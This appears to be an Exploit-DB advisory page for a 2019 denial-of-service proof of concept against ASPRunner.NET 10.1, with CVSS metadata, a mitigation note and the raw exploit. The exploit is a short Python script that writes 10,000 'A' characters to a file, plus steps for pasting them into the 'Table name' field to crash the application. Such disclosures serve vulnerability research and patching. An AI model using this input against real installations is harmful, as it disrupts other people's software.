ASPRunner.NET 10.1 - Denial of Service (PoC)

vendor:

ASPRunner.NET

by:

Victor Mondragón

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: ASPRunner.NET

Affected Version From: 10.1

Affected Version To: 10.1

Patch Exists: YES

Related CWE: N/A

CPE: a:xlinesoft:asprunner.net:10.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Service Pack 1 x64

2019

ASPRunner.NET 10.1 – Denial of Service (PoC)

ASPRunner.NET 10.1 is vulnerable to a denial of service attack when a maliciously crafted table name is used. An attacker can exploit this vulnerability by creating a file containing a long string of characters, copying the contents of the file to the clipboard, and then pasting the contents into the 'Table name' field when creating a new database. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of ASPRunner.NET 10.1 or later.

Source

Exploit-DB raw data:

#Exploit Title:  ASPRunner.NET 10.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: https://xlinesoft.com/
#Software Link: https://xlinesoft.com/asprunnernet/download.htm
#Tested Version: 10.1
#Tested on: Windows 7 Service Pack 1 x64 

#Steps to produce the crash:
#1.- Run python code: ASPRunner_net_10_1.py
#2.- Open ASPRunner_10_1.txt and copy content to clipboard
#3.- Open ASPRunner.NET
#4.- Click on "Next" > Select "SQLite" database > click on "Next"
#5.- Click on "Create new database" 
#6.- In "Table name" field Paste Clipboarad
#7.- Click on "Create table"
#8.- Crashed

cod = "\x41" * 10000
f = open('ASPRunner_10_1.txt', 'w')
f.write(cod)
f.close()